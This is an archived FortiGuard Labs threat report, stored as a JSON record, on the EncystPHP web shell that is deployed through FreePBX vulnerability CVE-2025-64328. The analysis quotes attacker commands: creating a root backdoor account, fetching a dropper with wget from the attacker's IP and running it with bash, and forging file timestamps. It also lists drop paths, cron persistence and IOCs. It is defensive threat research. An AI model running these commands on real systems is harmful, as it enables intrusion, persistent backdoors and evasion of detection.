{
	"id": "bdc1c4fe-3fec-4d6f-a40f-bd0ef6311bef",
	"created_at": "2026-04-06T00:09:59.776605Z",
	"updated_at": "2026-04-10T03:28:44.665428Z",
	"deleted_at": null,
	"sha1_hash": "813f7820008c206bdcbaf4af6559ac0f0be9239b",
	"title": "Unveiling the Weaponized Web Shell EncystPHP | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1773181,
	"plain_text": "Unveiling the Weaponized Web Shell EncystPHP | FortiGuard\r\nLabs\r\nBy Vincent Li\r\nPublished: 2026-01-28 · Archived: 2026-04-02 10:46:39 UTC\r\nAffected Platforms: FreePBX Endpoint Manager v17.0.2.36 – v17.0.3\r\nImpacted Users: Any organization\r\nImpact: Remote attackers gain control of the vulnerable systems\r\nSeverity Level: High\r\nFortiGuard Labs has discovered a web shell that we named “EncystPHP.” It features several advanced capabilities,\r\nincluding remote command execution, persistence mechanisms, and web shell deployment. Incidents were\r\nlaunched in early December last year and propagated via exploitation of the FreePBX vulnerability CVE-2025-\r\n64328.\r\nIts malicious activity appears to be associated with the hacker group INJ3CTOR3, first identified in 2020, which\r\ntargeted CVE-2019-19006. In 2022, the threat actor shifted its focus to the Elastix system via CVE-2021-45461.\r\nThese incidents begin with the exploitation of a FreePBX vulnerability, followed by the deployment of a PHP web\r\nshell in the target environments. We assess that this campaign represents recent attack activity and behavior\r\npatterns associated with INJ3CTOR3.\r\nThe following section provides an in-depth analysis of the related incidents and the EncystPHP web shell.\r\nIncidents\r\nThe web shell was delivered via CVE-2025-64328, a post-authentication command-injection vulnerability in the\r\nadministrative interface of the FreePBX Endpoint Manager.\r\nThe exploit originated from Brazil and targeted a victim environment managed by an Indian technology company\r\nspecializing in cloud solutions, communication services, and IT infrastructure.\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 1 of 16\n\nFigure 1: FreePBX administrative interface\r\nThe attackers downloaded the EncystPHP dropper from the IP address 45[.]234[.]176[.]202, which resolves to\r\nthe domain crm[.]razatelefonia[.]pro. 
The associated web page, Raza Telefonia, which appears to be a VoIP\r\nmanagement system, includes a login interface.\r\nFigure 2: EncystPHP attack traffic via CVE-2025-64328\r\nFigure 3: Malware download website\r\nWhen connected to the route new/ on the download source, the request is automatically redirected to another\r\ndropper named k.php.\r\nFigure 4: Malware download source redirects to the EncystPHP dropper\r\nMalware Analysis\r\nEncystPHP was initially delivered by exploiting the FreePBX vulnerability CVE-2025-64328. It deployed a web\r\nshell on victim hosts via the file named \"c\", which serves as the starting point for the following analysis.\r\nFigure 5: The EncystPHP file flow\r\nThe dropper first modifies the file permissions of ajax.php and model.php to 000, rendering both files\r\nunreadable, unwritable, and non-executable.\r\nFigure 6: Modifying file permission to 000\r\nEncystPHP then attempts to collect database configuration information from /etc/freepbx.conf and proceeds to\r\ndelete cron job entries and multiple FreePBX user accounts, including “ampuser,” “svc_freepbx,” “freepbx_svc,”\r\n“bluej,” “nahda,” “FreePBX_setup,” “emoadmin,” and “nvd0rz.”\r\nFigure 7: Collecting database configurations and deleting commands and users\r\nIt then searches for PHP files associated with web shells by identifying content such as Base64 decode functions,\r\npacket headers, or PHP functions that execute shell commands, and deletes all matching files.\r\nFigure 8: Deleting other PHP web shells\r\nEncystPHP also scans for PHP files containing strings such as “Badr,” “b3d0r,” “pastebin,” “yokyok,” or\r\n“bm2cjjnRXac1WW3KT7k6MKTR,” 
and removes these files. These may be related to older versions of the web\r\nshell itself or other malicious PHP files.\r\nFigure 9: Deleting PHP files with specific strings\r\nTo facilitate persistent control over the compromised host, the malware creates a root-level user named newfpbx,\r\nresets multiple user account passwords to a single value, and escalates their privileges.\r\nuseradd -s /bin/bash  -ou 0 -g 0 -p '$1$faV63BKr$4jH3MqYYmrpM55P.AWD2U1' newfpbx \u0026\u003e/dev/null\r\nFigure 10: Modifying system user with the same password\r\nFollowing this behavior, EncystPHP injects the SSH public key and modifies system configurations to ensure that\r\nthe default SSH port (22) remains open.\r\nFigure 11: Injecting the SSH public key\r\nFigure 12: Ensuring SSH is always open\r\nIt then downloads an additional dropper to support further web shell deployment and persistence.\r\n(setsid wget \"hxxp://45[.]234[.]176[.]202/new/k.php\" -O /var/spool/asterisk/tmp/serv 2\u003e/dev/null \u003e/dev/null; bash\r\n/var/spool/asterisk/tmp/serv 2\u003e/dev/null \u003e /dev/null \u0026 ) 2\u003e\u00261\r\nFigure 13: Downloading another dropper with Base64-encoded command\r\nAt the final stage of the c dropper execution, EncystPHP tampers with log files and deletes the FreePBX\r\nEndpoint Manager module named endpoint. After completing these actions, it restores file permissions on\r\nFreePBX-related files and reloads the configuration to avoid a service exception.\r\nFigure 14: Erasing traces and removing the endpoint\r\nThe c dropper then deploys a Base64-encoded web shell and downloads another dropper, named k.php. 
The\r\nk.php dropper performs similar actions, including deploying a Base64-encoded web shell, installing configuration\r\ncomponents, and establishing persistence mechanisms.\r\nWeb Shell\r\nThe payload is delivered in Base64-encoded format and decoded at runtime by the dropper component. The\r\ndecoded PHP web shell is written to disk, masquerading as a legitimate FreePBX file named ajax.php, allowing it\r\nto blend into the application structure.\r\nFigure 15: Base64-encoded web shell\r\nAuthentication is performed using a simple verification mechanism in which a plaintext password entered via the\r\nweb interface is hashed with MD5 and compared against a hard-coded hash value embedded in the web shell.\r\nFigure 16: Web shell authentication verification interface source code\r\nFigure 17: Web shell authentication verification interface\r\nFigure 18: Verifying hard-coded MD5 credentials\r\nUpon successful authentication, the web shell exposes an interactive interface titled Ask Master. 
This interface\r\nincludes multiple predefined operational commands, such as file system enumeration, process inspection,\r\nquerying active Asterisk channels, listing Asterisk SIP peers, and retrieving multiple FreePBX and Elastix\r\nconfiguration files.\r\nFigure 19: Web shell interface source code\r\nFigure 20: Web shell interface\r\nBy leveraging Elastix and FreePBX administrative contexts, the web shell operates with elevated privileges,\r\nenabling arbitrary command execution on the compromised host and initiating outbound call activity through the\r\nPBX environment.\r\nFigure 21: Elastix and FreePBX privilege escalation\r\nDropper\r\nThe file k.php also contains the previously mentioned Base64-encoded web shell. Once executed, it decodes the\r\npayload and writes it to disk as ajax.php, deploying it to multiple locations.\r\nFigure 22: Web shell deployment\r\nThe dropper creates several directories under the path /var/www/html/, including digium_phones/, rest_phones/,\r\ndigium_phoness/, phones/, fpbxphones/, freepbxphones/, and freepbx/.\r\nIt then copies the web shell EncystPHP from /var/www/html/admin/views/ajax.php and\r\n/var/www/html/rest_phones/ajax.php to the file paths listed in the following table. 
These paths correspond to\r\ncommonly accessible web routes, increasing resilience by ensuring that alternative access points remain available\r\nif one instance is removed.\r\n/var/www/html/rest_phones/ajax.php\r\n/var/www/html/admin/modules/core/ajax.php\r\n/var/www/html/digium_phones/ajax.php\r\n/var/www/html/admin/assets/js/config.php\r\n/var/www/html/admin/assets/config.php\r\n/var/www/html/admin/assets/ajax.php\r\n/var/www/html/admin/modules/core/ajax.php\r\n/var/www/html/phones/ajax.php\r\n/var/www/html/digium_phoness/ajax.php\r\n/var/www/html/fpbxphones/ajax.php\r\n/var/www/html/freepbxphones/ajax.php\r\n/var/www/html/freepbx/ajax.php\r\nAfter deploying the web shell, the dropper forges timestamps to match those of legitimate files, reducing the\r\nlikelihood of detection during routine inspection.\r\ntouch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php\r\nNext, the malware decodes a Base64-encoded configuration file and writes it to\r\n/var/www/html/admin/views/.htaccess. This configuration enables RewriteCond and RewriteRule directives for\r\nURL redirection. The rules first verify that the requested resource is neither a directory, a file, nor a symbolic link.\r\nThe final rule specifies that requests beginning with one or more whitespace characters are redirected to\r\nconfig.php.\r\nFigure 23: Configuration of EncystPHP\r\nFinally, the dropper decodes and writes the Base64-encoded shell script to /var/spool/asterisk/tmp/test.sh and\r\n/tmp/test.sh. The script is executed using bash, after which the attacker removes the script to eliminate forensic\r\nartifacts.\r\nFigure 24: Base64-encoded persistence shell script\r\nPersistence\r\nThe persistence mechanism implemented by EncystPHP consists of four parts. 
The first establishes persistence\r\nbefore executing test.sh. In this stage, the dropper c installs multiple crontab entries that download the secondary\r\ndropper k.php every minute, saving it as /var/lib/asterisk/bin/zen2 and /var/lib/asterisk/bin/devnull2.\r\nFigure 25: Initial persistence method in the dropper c\r\nNext, test.sh triggers the second and third persistence stages. It decodes a Base64-encoded file named license.php\r\nand writes it to /var/www/html/admin/modules/freepbx_ha/. This file subsequently downloads two droppers, c and\r\nk.php, and installs additional crontab entries.\r\nFigure 26: Persistence shell script “test.sh”\r\nThe third stage periodically downloads the dropper k.php and saves it as /var/lib/asterisk/bin/devnull every three\r\nminutes. It then echoes the rm command three times without executing it, creating the appearance that\r\nEncystPHP has been removed from the system.\r\nFigure 27: Crontab command in \"test.sh\"\r\nThe fourth persistence stage is executed via license.php. It downloads the dropper k.php as\r\n/var/lib/asterisk/bin/devnull2, and the dropper c as /var/lib/asterisk/bin/devnull23 and /trmp/devnull24 at one-minute intervals. 
In addition to maintaining persistence, this stage disables error reporting, executes EncystPHP,\r\nand removes log artifacts to hinder detection.\r\nFigure 28: Persistence PHP file license.php\r\nConclusion\r\nThis incident demonstrates how CVE-2025-64328 can be exploited to deploy stealthy, persistent web shells, such\r\nas EncystPHP, in FreePBX environments, underscoring that unpatched PBX systems remain high-value targets.\r\nAlthough the attack techniques are not entirely new, the observed behavior reflects an active and ongoing threat\r\nthat closely mirrors historical INJ3CTOR3 campaigns while adapting to current operational contexts.\r\nBecause it can blend into legitimate FreePBX and Elastix components, such activity may evade immediate\r\ndetection, leaving affected systems exposed to well-known risks, including long-term persistence, unauthorized\r\nadministrative access, and abuse of telephony resources. 
Organizations should treat any successful exploitation of\r\nthis vulnerability as a full compromise and prioritize immediate remediation, monitoring, and security hardening\r\nto mitigate further impact.\r\nFortinet Protections\r\nThe malware described in this report is detected and blocked by FortiGuard Antivirus as:\r\nPHP/EncystPHP.A!tr\r\nBASH/EncystPHP.A!tr\r\nThe FortiGuard AntiVirus service engine is integrated into FortiGate, FortiMail, FortiClient, and FortiEDR.\r\nCustomers running these products with up-to-date signatures are protected against the malware components\r\ndescribed in this report.\r\nThe FortiGuard Web Filtering Service blocks the C2 server.\r\nFortiGuard Labs provides an IPS signature against attacks exploiting the following vulnerabilities:\r\nCVE-2025-64328: 59448 FreePBX.Administration.GUI.filestore.Command.Injection\r\nOrganizations seeking to strengthen foundational security awareness may also consider completing Fortinet\r\nCertified Fundamentals (FCF) training in Cybersecurity. 
This module is designed to help end users learn how to\r\nidentify and protect themselves from phishing attacks.\r\nThe FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks infrastructure associated with\r\nthis campaign by correlating malicious IP intelligence collected from Fortinet’s global sensor network, CERT\r\ncollaborations, MITRE, trusted industry partners, and other intelligence sources.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, contact our Global\r\nFortiGuard Incident Response Team for assistance.\r\nIOCs\r\nURLs\r\nhxxp://45[.]234[.]176[.]202/new/c\r\nhxxp://45[.]234[.]176[.]202/new/k.php\r\nHosts\r\n45[.]234[.]176[.]202\r\n187[.]108[.]1[.]130\r\nFiles\r\n71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302\r\n7e3a47e3c6b82eb02f6f1e4be6b8de4762194868a8de8fc9103302af7915c574\r\nfc514c45fa8e3a49f003eae4e0c8b6a523409b8341503b529c85ffe396bb74f2\r\n285fac34a5ffdac7cb047d412862e1ca5e091e70c0ac0383b71159fdd0d20bb2\r\n29d74963f99563e711e5db39261df759f76da6893f3ca71a4704b9ee2b26b8c7\r\nMITRE ATT\u0026CK Mapping for EncystPHP Campaign\r\nTactic | Technique ID | Technique Name | Observed Activity in EncystPHP\r\nInitial Access | T1190 | Exploit Public-Facing Application | Exploitation of FreePBX Endpoint Manager via CVE-2025-64328 to execute post-authentication command injection\r\nExecution | T1059.004 | Command and Scripting Interpreter: Unix Shell | Execution of Bash commands via injected payloads and downloaded shell scripts\r\nPersistence | T1053.003 | Scheduled Task/Job: Cron | Multiple crontab entries installed to repeatedly download and execute droppers\r\nPersistence | T1505.003 | Server Software Component: Web Shell | Deployment of EncystPHP masquerading as legitimate FreePBX PHP files (ajax.php, config.php)\r\nPrivilege Escalation | T1068 | Exploitation for Privilege Escalation | Abuse of FreePBX administrative context to execute commands with elevated privileges\r\nPrivilege Escalation | T1136.001 | Create Account: Local Account | Creation of a root-level user account (newfpbx) with UID 0\r\nCredential Access | T1003 | OS Credential Dumping | Collection of database credentials from /etc/freepbx.conf\r\nDefense Evasion | T1070.004 | Indicator Removal on Host: File Deletion | Deletion of logs, cron artifacts, and FreePBX Endpoint Manager module\r\nDefense Evasion | T1222.002 | File and Directory Permissions Modification: Linux | Modification of file permissions to 000 to block access and disrupt inspection\r\nDefense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location | Web shell written to legitimate FreePBX file paths with forged timestamps\r\nDefense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools | Removal of competing web shells and disabling error reporting\r\nLateral Movement | T1021.004 | Remote Services: SSH | Injection of attacker-controlled SSH public key and forced exposure of port 22\r\nCommand and Control | T1105 | Ingress Tool Transfer | Repeated download of droppers (c, k.php) from attacker-controlled infrastructure\r\nCommand and Control | T1071.001 | Application Layer Protocol: Web Protocols | Use of HTTP for payload delivery and command execution\r\nImpact | T1496 | Resource Hijacking | Abuse of PBX resources for unauthorized telephony operations\r\nSource: https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp"
	],
	"report_names": [
		"unveiling-the-weaponized-web-shell-encystphp"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "07d5d8cf-7a15-47de-a1b7-a3333f064290",
			"created_at": "2026-02-07T02:00:03.660294Z",
			"updated_at": "2026-04-10T02:00:03.959064Z",
			"deleted_at": null,
			"main_name": "INJ3CTOR3",
			"aliases": [],
			"source_name": "MISPGALAXY:INJ3CTOR3",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434199,
	"ts_updated_at": 1775791724,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/813f7820008c206bdcbaf4af6559ac0f0be9239b.pdf",
		"text": "https://archive.orkl.eu/813f7820008c206bdcbaf4af6559ac0f0be9239b.txt",
		"img": "https://archive.orkl.eu/813f7820008c206bdcbaf4af6559ac0f0be9239b.jpg"
	}
}